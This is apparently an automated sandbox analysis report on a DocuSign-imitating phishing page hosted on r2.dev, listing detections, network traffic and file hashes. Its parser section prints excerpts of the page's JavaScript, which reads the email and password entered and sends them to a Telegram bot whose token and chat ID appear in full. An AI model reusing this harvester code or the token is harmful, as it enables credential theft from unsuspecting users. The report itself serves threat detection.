Windows Analysis Report
http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html

Overview

General Information

Sample URL:http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
Analysis ID:1591497
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Misleading page title found
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

  • System is w10x64
  • chrome.exe (PID: 2000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dropped/chromecache_48 | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
1.0.pages.csv | JoeSecurity_HtmlPhish_64 | Yara detected HtmlPhish_64 | Joe Security |
1.0.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
        No Sigma rule has matched
        No Suricata rule has matched


        AV Detection

        Source: http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html Avira URL Cloud: detection malicious, Label: malware

        Phishing

        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html Joe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is a well-known electronic signature service provider., The legitimate domain for DocuSign is 'docusign.com'., The provided URL 'pub-73e3a990093147c78a55ab4739ef17e5.r2.dev' does not match the legitimate domain., The URL uses a subdomain structure that is not associated with DocuSign., The domain 'r2.dev' is not related to DocuSign and could be a generic hosting or cloud service., Presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.0.pages.csv
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html Page Title: DocuSign Login - Enter your password to sign in
        Source: Yara match File source: 1.0.pages.csv, type: HTML
        Source: Yara match File source: dropped/chromecache_48, type: DROPPED
        Source: 0.1.id.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: Number of links: 0
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: On click: sendEmail()
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: <input type="password" .../> found
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: No <meta name="author".. found
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html HTTP Parser: No <meta name="copyright".. found
        Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknown TCP traffic detected without corresponding DNS query: 2.16.168.102
        Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic HTTP traffic detected:
        GET /docu/e_protocol.html HTTP/1.1
        Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        sec-ch-ua-platform: "Windows"
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9

        Source: global traffic HTTP traffic detected:
        GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
        Host: www.continentalsports.co.uk
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9

        Source: global traffic HTTP traffic detected:
        GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
        Host: www.continentalsports.co.uk
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: */*
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9

        Source: global traffic HTTP traffic detected:
        GET /docu/e_protocol.html HTTP/1.1
        Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9

        Source: global traffic DNS traffic detected: DNS query: www.google.com
        Source: global traffic DNS traffic detected: DNS query: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
        Source: global traffic DNS traffic detected: DNS query: www.continentalsports.co.uk
        Source: chromecache_48.2.dr String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
        Source: chromecache_48.2.dr String found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_48.2.dr String found in binary or memory: https://logo.clearbit.com/
        Source: chromecache_48.2.dr String found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
        Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
        Source: classification engine Classification label: mal92.phis.win@17/10@10/7
        Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
        Source: Window Recorder Window detected: More than 3 window changes detected
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
        Behavior Graph: ID: 1591497, URL: http://pub-73e3a990093147c7..., Startdate: 15/01/2025, Architecture: WINDOWS, Score: 92

        Source | Detection | Scanner | Label | Link
        http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html | 100% | Avira URL Cloud | malware |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg | 0% | Avira URL Cloud | safe |
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l | 0% | Avira URL Cloud | safe |


        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | 172.66.0.235 | true | true | | unknown
        www.google.com | 142.250.186.100 | true | false | | high
        www.continentalsports.co.uk | 95.154.228.177 | true | false | | high

        Name | Malicious | Antivirus Detection | Reputation
        http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html | true | | unknown
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg | false | Avira URL Cloud: safe | unknown
        https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html | true | | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://api.telegram.org/bot$ | chromecache_48.2.dr | false | | high
        https://logo.clearbit.com/ | chromecache_48.2.dr | false | | high
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l | chromecache_48.2.dr | false | Avira URL Cloud: safe | unknown

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        162.159.140.237 | unknown | United States | | 13335 | CLOUDFLARENETUS | false
        95.154.228.177 | www.continentalsports.co.uk | United Kingdom | | 20860 | IOMART-ASGB | false
        239.255.255.250 | unknown | Reserved | | unknown | unknown | false
        142.250.186.100 | www.google.com | United States | | 15169 | GOOGLEUS | false
        172.66.0.235 | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | United States | | 13335 | CLOUDFLARENETUS | true

        IP
        192.168.2.4
        192.168.2.5

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591497
                      Start date and time:2025-01-15 01:38:01 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.phis.win@17/10@10/7
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 216.58.206.46, 64.233.167.84, 142.250.186.163, 142.250.185.238, 172.217.23.110, 142.250.184.238, 216.58.206.74, 172.217.18.10, 142.250.185.234, 142.250.186.170, 142.250.186.138, 172.217.23.106, 142.250.186.42, 172.217.16.202, 142.250.186.106, 142.250.181.234, 216.58.206.42, 142.250.185.106, 142.250.186.74, 216.58.212.138, 142.250.185.170, 142.250.185.202, 142.250.184.202, 142.250.184.234, 199.232.210.172, 2.17.190.73, 142.250.186.110, 142.250.185.110, 142.250.184.206, 172.217.18.110, 216.58.206.78, 216.58.206.67, 184.28.90.27, 52.149.20.212, 13.107.246.45
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                      • Not all processes were analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      No simulations
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:downloaded
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:dropped
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65350)
                      Category:downloaded
                      Size (bytes):252205
                      Entropy (8bit):6.083975621579217
                      Encrypted:false
                      SSDEEP:6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
                      MD5:AC9DBD4FD1FB0ADD29A1B8703BCE9406
                      SHA1:D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
                      SHA-256:6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
                      SHA-512:FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
                      Malicious:false
                      Reputation:low
                      URL:https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:downloaded
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      URL:https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:dropped
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.875
                      Encrypted:false
                      SSDEEP:3:HwT:QT
                      MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                      SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                      SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
                      SHA-512:EB9F1CD4A566192160371F4B182EE00180F6912333FFB79C537BD80635A6AFE6379FBE7BB74043D635BA65C9F4F956D9E97E516E24E516F2591192A36F866EAE
                      Malicious:false
                      Reputation:low
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl6DH3I5QBasxIFDc5BTHo=?alt=proto
                      Preview:CgkKBw3OQUx6GgA=
                      No static file info

                      • Total Packets: 149
                      • 443 (HTTPS)
                      • 80 (HTTP)
                      • 53 (DNS)
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jan 15, 2025 01:39:00.716095924 CET | 192.168.2.4 | 1.1.1.1 | 0x5507 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:00.716226101 CET | 192.168.2.4 | 1.1.1.1 | 0xf3b0 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.307725906 CET | 192.168.2.4 | 1.1.1.1 | 0xc54 | Standard query (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.308813095 CET | 192.168.2.4 | 1.1.1.1 | 0xa540 | Standard query (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.816545010 CET | 192.168.2.4 | 1.1.1.1 | 0x6cde | Standard query (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.816844940 CET | 192.168.2.4 | 1.1.1.1 | 0x7aa2 | Standard query (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:39:03.939138889 CET | 192.168.2.4 | 1.1.1.1 | 0xd1c1 | Standard query (0) | www.continentalsports.co.uk | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:03.939346075 CET | 192.168.2.4 | 1.1.1.1 | 0x5736 | Standard query (0) | www.continentalsports.co.uk | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:39:05.140811920 CET | 192.168.2.4 | 1.1.1.1 | 0x8547 | Standard query (0) | www.continentalsports.co.uk | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:05.140938997 CET | 192.168.2.4 | 1.1.1.1 | 0x844d | Standard query (0) | www.continentalsports.co.uk | 65 | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jan 15, 2025 01:39:00.722950935 CET | 1.1.1.1 | 192.168.2.4 | 0x5507 | No error (0) | www.google.com | | 142.250.186.100 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:00.723340034 CET | 1.1.1.1 | 192.168.2.4 | 0xf3b0 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.316836119 CET | 1.1.1.1 | 192.168.2.4 | 0xc54 | No error (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | | 172.66.0.235 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.316836119 CET | 1.1.1.1 | 192.168.2.4 | 0xc54 | No error (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | | 162.159.140.237 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.825675964 CET | 1.1.1.1 | 192.168.2.4 | 0x6cde | No error (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | | 162.159.140.237 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:02.825675964 CET | 1.1.1.1 | 192.168.2.4 | 0x6cde | No error (0) | pub-73e3a990093147c78a55ab4739ef17e5.r2.dev | | 172.66.0.235 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:04.153801918 CET | 1.1.1.1 | 192.168.2.4 | 0xd1c1 | No error (0) | www.continentalsports.co.uk | | 95.154.228.177 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:39:05.358242989 CET | 1.1.1.1 | 192.168.2.4 | 0x8547 | No error (0) | www.continentalsports.co.uk | | 95.154.228.177 | A (IP address) | IN (0x0001) | false
                      • pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
                      • www.continentalsports.co.uk
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49741 | 172.66.0.235 | 80 | 3104 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jan 15, 2025 01:39:02.332468033 CET | 478 | OUT | GET /docu/e_protocol.html HTTP/1.1
                      Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jan 15, 2025 01:39:02.813405991 CET | 534 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Wed, 15 Jan 2025 00:39:02 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Wed, 15 Jan 2025 01:39:02 GMT
                      Location: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 9021ce7238c70f3e-EWR
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jan 15, 2025 01:39:47.823303938 CET | 6 | OUT | Data Raw: 00


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49743 | 162.159.140.237 | 443 | 3104 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:39:03 UTC | 706 | OUT | GET /docu/e_protocol.html HTTP/1.1
                      Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:39:03 UTC | 284 | IN | HTTP/1.1 200 OK
                      Date: Wed, 15 Jan 2025 00:39:03 GMT
                      Content-Type: text/html
